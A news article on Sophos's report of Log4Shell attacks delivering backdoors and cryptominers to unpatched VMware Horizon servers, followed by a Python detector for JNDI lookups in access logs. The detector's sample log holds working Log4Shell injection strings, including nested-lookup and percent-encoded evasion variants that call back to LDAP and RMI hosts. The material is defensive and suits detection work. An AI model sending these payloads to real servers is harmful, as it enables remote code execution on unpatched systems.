Attackers are using the Log4Shell vulnerability to deliver backdoors and profiling scripts to unpatched VMware Horizon servers.
Cybersecurity company Sophos said that multiple adversaries are targeting vulnerable Horizon servers, paving the way for persistent access and future ransomware attacks.
Log4Shell (CVE-2021-44228) is a remote code execution vulnerability in Apache Log4j, a Java logging library embedded in hundreds of software products. The vulnerability was disclosed and patched in December 2021.
Amit Yoran, CEO of cybersecurity company Tenable, said that the Apache Log4j Remote Code Execution Vulnerability is the last decade’s single most significant, critical vulnerability.
“The discovery of this vulnerability is nothing short of a Fukushima moment for the cybersecurity industry.”
According to Sean Gallagher, a senior security researcher at Sophos, Sophos detections reveal waves of attacks targeting Horizon servers starting in January, delivering a range of backdoors and cryptominers to unpatched servers, as well as scripts that collect some device information.
“Widely used applications such as VMware Horizon that are exposed to the internet and need to be manually updated are particularly vulnerable to exploitation at scale. […] Log4j is installed in hundreds of software products. Many organizations may be unaware of the vulnerability lurking within their infrastructure, particularly in commercial, open-source, or custom software that doesn’t have regular security support,” Gallagher said.
Sophos believes that some of the backdoors may be delivered by Initial Access Brokers looking to secure persistent remote access to a high-value target that they can sell to other attackers, such as ransomware operators.
Sophos detected multiple attack payloads using Log4Shell to target vulnerable Horizon servers:
* Two legitimate remote monitoring and management tools, Atera agent and Splashtop Streamer, likely intended for malicious use as backdoors
* The malicious Sliver backdoor
* The cryptominers z0Miner, JavaX miner, Jin and Mimu
* Several PowerShell-based reverse shells that collect device and backup information
According to Sophos, the largest wave of attacks that began in mid-January 2022 executed the cryptominer installer script directly from the Apache Tomcat component of the VMware Horizon server. This wave of attacks is ongoing.
“Sophos’ findings suggest that multiple adversaries are implementing these attacks, so the most important protective step is to upgrade all devices and applications, including Log4j, with the patched version of the software. This includes patched versions of VMware Horizon if organizations use the application in their network,” said Gallagher.
Patching alone is not enough: attackers may already have installed a web shell or backdoor before the patch was applied, so servers that were exposed while vulnerable should be checked for signs of compromise.
“Defense in depth and acting upon any detection of miners and other anomalous activity is critical to avoid falling victim to such attacks.”
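As an added example of the kind of detection the advice above calls for (this is not Sophos’ or the article’s code), the following Python scans web-server log lines for the JNDI lookup strings that trigger Log4Shell. It handles two disguises that defeat a naive grep: percent-encoding in request paths, and nested Log4j lookups such as `${lower:j}` or `${env:NaN:-i}` that the library resolves before performing the JNDI call. The log lines are constructed for this example in Tomcat common-log style with the User-Agent appended; the IP addresses and paths are placeholders, not indicators from the article.

```python
import re
from urllib.parse import unquote

# Nested lookups that Log4j 2.x resolves before the JNDI call. These cover the
# common evasions; they are not an exhaustive model of Log4j's lookup syntax.
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")        # ${env:NaN:-j} -> j, ${::-j} -> j
_CASE_FOLD = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)  # ${lower:J} -> j
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def normalize(payload: str) -> str:
    """Resolve nested Log4j lookups until the string stops changing (innermost first)."""
    prev = None
    s = payload
    while s != prev:
        prev = s
        s = _CASE_FOLD.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s
        )
        s = _DEFAULT_VALUE.sub(lambda m: m.group(1), s)
    return s


def find_jndi_lookups(lines):
    """Return one hit per JNDI lookup found, with the scheme and callback target."""
    hits = []
    for idx, line in enumerate(lines, start=1):
        resolved = normalize(unquote(line))  # decode URL escapes, then resolve lookups
        for m in _JNDI.finditer(resolved):
            hits.append({
                "line": idx,
                "scheme": m.group(1).lower(),
                "target": m.group(2),
                "disguised": resolved != line,  # encoded or nested-lookup obfuscation
                "resolved": m.group(0),
            })
    return hits


# Constructed sample log lines (hypothetical addresses and paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jan/2022:09:14:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 1934 "Mozilla/5.0"',
    '203.0.113.9 - - [18/Jan/2022:09:15:41 +0000] "GET /portal/info.jsp HTTP/1.1" 200 1934 "${jndi:ldap://203.0.113.66:1389/a}"',
    '198.51.100.23 - - [18/Jan/2022:09:16:07 +0000] "GET /broker/xml HTTP/1.1" 200 512 "${${lower:j}${upper:n}${::-d}${env:NaN:-i}:${lower:ldap}://203.0.113.66:1389/o=tomcat}"',
    '203.0.113.5 - - [18/Jan/2022:09:17:30 +0000] "GET /portal/?q=${foo} HTTP/1.1" 200 1934 "Mozilla/5.0"',
    '198.51.100.24 - - [18/Jan/2022:09:18:12 +0000] "GET /broker/xml HTTP/1.1" 200 512 "${JNDI:rmi://203.0.113.67:1099/Exploit}"',
    '198.51.100.25 - - [18/Jan/2022:09:19:55 +0000] "GET /portal/?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.68%2Fx%7D HTTP/1.1" 200 1934 "curl/7.79"',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} callback to {hit['target']}"
              f"{' (disguised)' if hit['disguised'] else ''}")
```

Run it over the access log of the Horizon server’s Tomcat component (the access log must be configured to record the User-Agent and other headers attackers use as injection points, which the default pattern does not). A hit proves only that an exploit attempt was logged, not that it succeeded; the callback target is the lead to follow in outbound connection logs, and any server with a hit from before patching should be examined for the RMM agents, Sliver and miners listed above.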